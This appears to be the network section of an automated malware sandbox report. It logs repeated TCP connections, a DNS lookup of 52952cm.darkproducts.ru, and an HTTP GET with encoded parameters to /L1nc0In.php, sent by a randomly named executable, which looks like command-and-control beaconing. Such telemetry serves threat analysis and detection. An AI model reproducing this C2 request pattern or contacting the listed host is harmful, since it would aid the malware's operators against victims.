Jan 3, 2025 17:03:20.057482004 CET	80	49990	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:20.784693003 CET	80	49990	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:20.827491999 CET	49990	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:20.920105934 CET	80	49990	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:20.968142033 CET	49990	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:25.937402010 CET	49990	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:25.938218117 CET	49991	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:25.942471981 CET	80	49990	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:25.942538977 CET	49990	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:25.943044901 CET	80	49991	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:25.943120003 CET	49991	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:25.943257093 CET	49991	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:25.948057890 CET	80	49991	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:25.948157072 CET	80	49991	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:26.665169001 CET	80	49991	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:26.718148947 CET	49991	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:31.672879934 CET	49992	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:31.677786112 CET	80	49992	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:31.677862883 CET	49992	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:31.677973032 CET	49992	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:31.682766914 CET	80	49992	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:31.682919979 CET	80	49992	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:32.403667927 CET	80	49992	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:32.455074072 CET	49992	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:37.406481028 CET	49992	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:37.407937050 CET	49993	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:37.411600113 CET	80	49992	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:37.411654949 CET	49992	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:37.412765980 CET	80	49993	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:37.412833929 CET	49993	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:37.412955999 CET	49993	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:37.417737007 CET	80	49993	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:37.417841911 CET	80	49993	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:38.101046085 CET	80	49993	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:38.155618906 CET	49993	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:43.110327005 CET	49993	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:43.110332966 CET	49994	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:43.115252018 CET	80	49994	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:43.115438938 CET	80	49993	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:43.119081020 CET	49993	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:43.119087934 CET	49994	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:43.119235992 CET	49994	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:43.124011040 CET	80	49994	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:43.124201059 CET	80	49994	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:43.794249058 CET	80	49994	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:43.889945984 CET	49994	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:48.812787056 CET	49994	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:48.815787077 CET	49995	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:48.817856073 CET	80	49994	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:48.820630074 CET	80	49995	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:48.820666075 CET	49994	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:48.823730946 CET	49995	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:48.823730946 CET	49995	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:48.828587055 CET	80	49995	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:48.828797102 CET	80	49995	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:49.547957897 CET	80	49995	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:49.593065977 CET	49995	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:49.677324057 CET	80	49995	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:49.718076944 CET	49995	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:54.688124895 CET	49996	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:54.688124895 CET	49995	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:54.693126917 CET	80	49996	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:54.693200111 CET	80	49995	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:54.696034908 CET	49996	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:54.696036100 CET	49995	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:54.696314096 CET	49996	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:03:54.701133013 CET	80	49996	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:54.701287985 CET	80	49996	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:55.391333103 CET	80	49996	104.21.12.142	192.168.2.5
Jan 3, 2025 17:03:55.436855078 CET	49996	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:00.408951998 CET	49997	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:00.408956051 CET	49996	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:00.414010048 CET	80	49997	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:00.414228916 CET	80	49996	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:00.417093992 CET	49996	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:00.417098045 CET	49997	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:00.417098045 CET	49997	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:00.422025919 CET	80	49997	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:00.422044039 CET	80	49997	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:01.137710094 CET	80	49997	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:01.188950062 CET	49997	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:06.156366110 CET	49997	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:06.157932997 CET	49998	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:06.161464930 CET	80	49997	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:06.161545992 CET	49997	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:06.162796021 CET	80	49998	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:06.162858963 CET	49998	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:06.162981033 CET	49998	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:06.167691946 CET	80	49998	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:06.167855024 CET	80	49998	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:06.843265057 CET	80	49998	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:06.976847887 CET	80	49998	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:06.976998091 CET	49998	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:12.117902994 CET	49999	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:12.122798920 CET	80	49999	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:12.122863054 CET	49999	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:12.127033949 CET	49999	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:12.131855011 CET	80	49999	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:12.131927013 CET	80	49999	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:12.817615032 CET	80	49999	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:12.952429056 CET	49999	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:17.828290939 CET	49999	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:17.829356909 CET	50000	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:17.833514929 CET	80	49999	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:17.833568096 CET	49999	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:17.834134102 CET	80	50000	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:17.834192038 CET	50000	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:17.834363937 CET	50000	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:17.839138031 CET	80	50000	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:17.839265108 CET	80	50000	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:18.562685013 CET	80	50000	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:18.608689070 CET	50000	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:23.581372976 CET	50000	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:23.584326982 CET	50001	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:23.586416960 CET	80	50000	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:23.586464882 CET	50000	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:23.589180946 CET	80	50001	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:23.589293957 CET	50001	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:23.589637041 CET	50001	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:23.594477892 CET	80	50001	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:23.594546080 CET	80	50001	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:24.297055960 CET	80	50001	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:24.345052958 CET	50001	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:29.320380926 CET	50001	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:29.324939966 CET	50002	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:29.325737000 CET	80	50001	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:29.325999975 CET	50001	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:29.329766035 CET	80	50002	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:29.329925060 CET	50002	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:29.331883907 CET	50002	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:29.336652994 CET	80	50002	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:29.336802006 CET	80	50002	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:30.031131983 CET	80	50002	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:30.202537060 CET	50002	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:35.048945904 CET	50002	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:35.048970938 CET	50003	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:35.074732065 CET	80	50003	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:35.075025082 CET	80	50002	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:35.077044010 CET	50003	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:35.077044964 CET	50002	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:35.080971003 CET	50003	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:35.085762978 CET	80	50003	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:35.085890055 CET	80	50003	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:35.769171953 CET	80	50003	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:35.924546957 CET	50003	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:40.781347036 CET	50003	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:40.784941912 CET	50004	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:40.786395073 CET	80	50003	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:40.789203882 CET	50003	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:40.789726973 CET	80	50004	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:40.789911985 CET	50004	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:40.789994001 CET	50004	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:40.794761896 CET	80	50004	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:40.794878006 CET	80	50004	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:41.505434036 CET	80	50004	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:41.685560942 CET	50004	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:46.516954899 CET	50005	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:46.516957998 CET	50004	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:46.522361994 CET	80	50005	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:46.522418022 CET	80	50004	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:46.522548914 CET	50005	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:46.522552967 CET	50004	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:46.522782087 CET	50005	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:46.527549028 CET	80	50005	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:46.527669907 CET	80	50005	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:47.226155996 CET	80	50005	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:47.282968044 CET	50005	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:47.357685089 CET	80	50005	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:47.405519009 CET	50005	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:52.375180960 CET	50005	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:52.376135111 CET	50006	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:52.380357981 CET	80	50005	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:52.380434990 CET	50005	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:52.380942106 CET	80	50006	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:52.384136915 CET	50006	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:52.384136915 CET	50006	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:52.389005899 CET	80	50006	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:52.389113903 CET	80	50006	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:53.106367111 CET	80	50006	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:53.108985901 CET	50006	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:53.114058018 CET	80	50006	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:53.115072012 CET	50006	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:58.110641956 CET	50007	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:58.115547895 CET	80	50007	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:58.115617037 CET	50007	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:58.115778923 CET	50007	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:04:58.120619059 CET	80	50007	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:58.120629072 CET	80	50007	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:58.844311953 CET	80	50007	104.21.12.142	192.168.2.5
Jan 3, 2025 17:04:58.890955925 CET	50007	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:03.860977888 CET	50007	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:03.862195015 CET	50008	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:03.864099026 CET	49998	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:03.864196062 CET	49991	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:03.866137981 CET	80	50007	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:03.866194010 CET	50007	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:03.867041111 CET	80	50008	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:03.867129087 CET	50008	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:03.867233038 CET	50008	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:03.874890089 CET	80	50008	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:03.874898911 CET	80	50008	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:04.587675095 CET	80	50008	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:04.629486084 CET	50008	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:09.593684912 CET	50008	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:09.594602108 CET	50009	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:09.598820925 CET	80	50008	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:09.598879099 CET	50008	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:09.599431992 CET	80	50009	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:09.599494934 CET	50009	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:09.599611998 CET	50009	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:09.604402065 CET	80	50009	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:09.604571104 CET	80	50009	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:10.341664076 CET	80	50009	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:10.389893055 CET	50009	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:15.343970060 CET	50009	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:15.346997976 CET	50010	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:15.349057913 CET	80	50009	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:15.351855993 CET	80	50010	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:15.353080034 CET	50009	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:15.353091955 CET	50010	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:15.355986118 CET	50010	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:15.360771894 CET	80	50010	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:15.360920906 CET	80	50010	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:16.040446043 CET	80	50010	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:16.089062929 CET	50010	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:21.046981096 CET	50010	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:21.052324057 CET	80	50010	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:21.052362919 CET	50011	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:21.055972099 CET	50010	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:21.057274103 CET	80	50011	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:21.059159994 CET	50011	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:21.059159994 CET	50011	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:21.063930035 CET	80	50011	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:21.064073086 CET	80	50011	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:21.772321939 CET	80	50011	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:21.827372074 CET	50011	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:26.781858921 CET	50011	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:26.781860113 CET	50012	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:26.786828995 CET	80	50012	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:26.786925077 CET	80	50011	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:26.789052010 CET	50011	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:26.789052963 CET	50012	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:26.789386988 CET	50012	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:26.794176102 CET	80	50012	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:26.794393063 CET	80	50012	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:27.505848885 CET	80	50012	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:27.546119928 CET	50012	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:32.718393087 CET	50012	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:32.719343901 CET	50013	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:32.723478079 CET	80	50012	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:32.723568916 CET	50012	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:32.724162102 CET	80	50013	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:32.724282026 CET	50013	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:32.724333048 CET	50013	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:32.729106903 CET	80	50013	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:32.729250908 CET	80	50013	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:33.479701996 CET	80	50013	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:33.600409985 CET	50013	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:38.492963076 CET	50013	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:38.498178005 CET	80	50013	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:38.501027107 CET	50013	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:38.504966974 CET	50014	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:38.509860039 CET	80	50014	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:38.515693903 CET	50014	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:38.515693903 CET	50014	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:38.520553112 CET	80	50014	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:38.520664930 CET	80	50014	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:39.236140013 CET	80	50014	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:39.421113014 CET	50014	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:44.249775887 CET	50014	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:44.252970934 CET	50015	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:44.254812956 CET	80	50014	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:44.254859924 CET	50014	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:44.257762909 CET	80	50015	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:44.257829905 CET	50015	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:44.258023024 CET	50015	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:44.262779951 CET	80	50015	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:44.262914896 CET	80	50015	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:44.983715057 CET	80	50015	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:45.108968973 CET	50015	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:49.999866009 CET	50015	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:50.000899076 CET	50016	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:50.006836891 CET	80	50015	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:50.006891012 CET	50015	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:50.007426977 CET	80	50016	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:50.007496119 CET	50016	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:50.007626057 CET	50016	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:50.014307022 CET	80	50016	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:50.015755892 CET	80	50016	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:50.746175051 CET	80	50016	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:50.796972036 CET	50016	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:55.765640020 CET	50016	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:55.766340971 CET	50017	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:55.771054029 CET	80	50016	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:55.771111012 CET	50016	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:55.771152020 CET	80	50017	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:55.771214962 CET	50017	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:55.771361113 CET	50017	80	192.168.2.5	104.21.12.142
Jan 3, 2025 17:05:55.776124001 CET	80	50017	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:55.776326895 CET	80	50017	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:56.505438089 CET	80	50017	104.21.12.142	192.168.2.5
Jan 3, 2025 17:05:56.546092033 CET	50017	80	192.168.2.5	104.21.12.142

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 17:01:58.306936026 CET	61980	53	192.168.2.5	1.1.1.1
Jan 3, 2025 17:01:58.464445114 CET	53	61980	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 17:01:58.306936026 CET	192.168.2.5	1.1.1.1	0xdbdd	Standard query (0)	52952cm.darkproducts.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 17:01:58.464445114 CET	1.1.1.1	192.168.2.5	0xdbdd	No error (0)	52952cm.darkproducts.ru		104.21.12.142	A (IP address)	IN (0x0001)	false
Jan 3, 2025 17:01:58.464445114 CET	1.1.1.1	192.168.2.5	0xdbdd	No error (0)	52952cm.darkproducts.ru		172.67.194.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

52952cm.darkproducts.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:01:58.476496935 CET	474	OUT	GET /L1nc0In.php?0dYlI1orS1H6xFOx8XSck9t=FZ&6f2f8138a6e862c9cc5a89afaa068eff=310dbed95ebf165903903d07e44ebdc0&c6a92fac9f4420a60e173afb34e4bea8=wMlZTNyYWZzUDZhN2NzczN4UDZlljY2YTN0MjZyUmNzcjNiRDO1YjY&0dYlI1orS1H6xFOx8XSck9t=FZ HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:01:59.274832010 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qlS9ajVJIPsEkCbk4ZJg3ObrY8ztbsulTwbiirQJm1H9Pd1T%2BqqMayN7ZSC9JjPMWeICXmobk5Ee8Tg9%2B0VArzp%2FCvVEnPKQ6RvrFTHZOwsM8EYafSOmA4FU%2FA2ABYFBKaXGjLq1al%2F13g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc435e6fa9ec470-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1670&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 37 34 0d 0a 3d 30 6e 49 30 51 57 4e 33 49 47 4e 31 4d 57 4e 6d 46 57 59 34 4d 6d 5a 79 59 47 5a 7a 49 6d 5a 7a 6b 54 59 34 51 57 